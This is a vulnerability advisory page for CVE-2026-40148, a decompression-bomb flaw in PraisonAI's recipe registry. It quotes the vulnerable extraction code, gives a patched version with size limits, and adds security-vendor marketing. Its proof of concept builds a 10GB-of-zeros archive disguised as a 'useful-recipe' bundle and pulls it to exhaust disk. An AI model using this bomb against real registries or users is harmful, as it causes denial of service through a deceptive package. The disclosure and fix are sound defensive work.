CVE-2026-40148

CVE-2026-40148 is a medium-severity security vulnerability in PraisonAI (pip), affecting versions < 4.5.128. It is fixed in 4.5.128.

Summary

The _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull().

Details

The vulnerable function is _safe_extractall() at src/praisonai/praisonai/recipe/registry.py:131-162:

def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    dest_resolved = dest_dir.resolve()
    for member in tar.getmembers():
        member_path = Path(member.name)
        # Reject absolute paths
        if member_path.is_absolute():
            raise RegistryError(...)
        # Reject '..' components
        if '..' in member_path.parts:
            raise RegistryError(...)
        # Reject resolved paths escaping dest_dir
        resolved = (dest_resolved / member_path).resolve()
        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
            raise RegistryError(...)
    # All members validated, safe to extract
    tar.extractall(dest_dir)  # <-- No size limit

The function iterates all tar members and checks for path traversal (absolute paths, .. components, resolved path escaping), but never inspects member.size. The TarInfo.size attribute is available on every member and represents the uncompressed size, but it is never read.

This function is called from two locations:

  • LocalRegistry.pull() at line 396-397
  • HttpRegistry.pull() at line 791-792

The publish() method at line 296-298 only copies the compressed bundle via shutil.copy2(), so the bomb only detonates when a victim calls pull().

No size limits, upload quotas, or decompression guards exist anywhere in the registry module.

PoC

# Step 1: Create a malicious recipe bundle
mkdir bomb && cd bomb

cat > manifest.json << 'EOF'
{"name": "useful-recipe", "version": "1.0.0", "description": "Helpful AI recipe", "tags": ["ai"], "files": ["agent.yaml"]}
EOF

# Create a 10GB file of zeros (compresses to ~10MB with gzip)
dd if=/dev/zero of=agent.yaml bs=1M count=10240

# Bundle it as a .praison file
tar czf ../useful-recipe-1.0.0.praison manifest.json agent.yaml
cd ..

# Step 2: Publish to local registry (~10MB stored)
python -c "
from praisonai.recipe.registry import LocalRegistry
reg = LocalRegistry()
reg.publish('useful-recipe-1.0.0.praison')
"

# Step 3: Victim pulls, extracts 10GB to disk
python -c "
from praisonai.recipe.registry import LocalRegistry
reg = LocalRegistry()
reg.pull('useful-recipe')
"
# Result: 10GB+ written to disk, potential disk exhaustion

Impact

  • Disk exhaustion: A small compressed bundle (~10MB) can extract to 10GB+ of data, filling the victim's disk and causing denial of service for PraisonAI and potentially other applications on the same system.
  • No authentication required: The local registry has no access controls on publish(), and HTTP registry bundles are fetched from remote servers that the attacker controls.
  • Silent detonation: The extraction happens automatically during pull() with no progress indication or size warning to the user.

CVE-2026-40148 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.5.128); upgrading removes the vulnerable code path.

Affected versions

PraisonAI (< 4.5.128)

Security releases

PraisonAI → 4.5.128 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add a maximum extraction size limit to _safe_extractall():

MAX_EXTRACT_SIZE = 500 * 1024 * 1024  # 500MB
MAX_MEMBER_COUNT = 1000

def _safe_extractall(tar: tarfile.TarFile, dest_dir: Path) -> None:
    dest_resolved = dest_dir.resolve()
    members = tar.getmembers()
    
    if len(members) > MAX_MEMBER_COUNT:
        raise RegistryError(
            f"Archive contains too many members ({len(members)} > {MAX_MEMBER_COUNT})"
        )
    
    total_size = 0
    for member in members:
        member_path = Path(member.name)
        if member_path.is_absolute():
            raise RegistryError(
                f"Refusing to extract absolute path in archive: {member.name}"
            )
        if '..' in member_path.parts:
            raise RegistryError(
                f"Refusing to extract path traversal in archive: {member.name}"
            )
        resolved = (dest_resolved / member_path).resolve()
        if not str(resolved).startswith(str(dest_resolved) + os.sep) and resolved != dest_resolved:
            raise RegistryError(
                f"Refusing to extract path escaping target directory: {member.name}"
            )
        total_size += member.size
        if total_size > MAX_EXTRACT_SIZE:
            raise RegistryError(
                f"Archive extraction would exceed size limit "
                f"({total_size} > {MAX_EXTRACT_SIZE} bytes)"
            )
    tar.extractall(dest_dir)

Frequently Asked Questions

  1. What is CVE-2026-40148? CVE-2026-40148 is a medium-severity security vulnerability in PraisonAI (pip), affecting versions < 4.5.128. It is fixed in 4.5.128.
  2. How severe is CVE-2026-40148? CVE-2026-40148 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of PraisonAI are affected by CVE-2026-40148? PraisonAI (pip) versions < 4.5.128 is affected.
  4. Is there a fix for CVE-2026-40148? Yes. CVE-2026-40148 is fixed in 4.5.128. Upgrade to this version or later.
  5. Is CVE-2026-40148 exploitable, and should I be worried? Whether CVE-2026-40148 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-40148 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-40148? Upgrade PraisonAI to 4.5.128 or later.

Other vulnerabilities in PraisonAI

Stop the waste.
Protect your environment with Kodem.